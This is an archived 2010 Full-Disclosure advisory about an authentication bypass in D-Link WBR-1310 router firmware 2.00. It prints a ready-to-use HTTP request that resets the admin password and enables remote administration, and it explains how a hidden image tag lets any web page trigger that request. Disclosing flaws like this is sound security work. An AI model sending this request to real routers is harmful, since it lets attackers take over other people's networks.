lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <AANLkTimmtRA1UTWtLPOkDzvYgV-VgOCeTB7QJmM8iMiE@mail.gmail.com>
Date: Wed, 22 Dec 2010 22:34:02 -0500
From: Craig Heffner <cheffner@...ttys0.com>
To: full-disclosure@...ts.grok.org.uk
Subject: D-Link WBR-1310 Authentication Bypass
	Vulnerability

The CGI scripts in the WBR-1310 (firmware v.2.00) do not validate
authentication credentials. Administrative settings can be changed by
sending the appropriate HTTP request directly to a CGI script without
authenticating to the device.

The following request will change the administrative password to 'hacked'
and enable remote administration on port 8080:
http://192.168.0.1/tools_admin.cgi?admname=admin&admPass1=hacked&admPass2=hacked&username=user&userPass1=WDB8WvbXdHtZyM8&userPass2=WDB8WvbXdHtZyM8&hip1=*&hport=8080&hEnable=1

Even if remote administration is not enabled, any Web page that any internal
user browses to can change the administrator password and enable remote
administration via a hidden image tag embedded in the Web page. No
Javascript required.

Newer versions of the WBR-1310 firmware are not vulnerable, but since
version 2.00 is the default firmware, most WBR-1310 routers are still
running it.

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ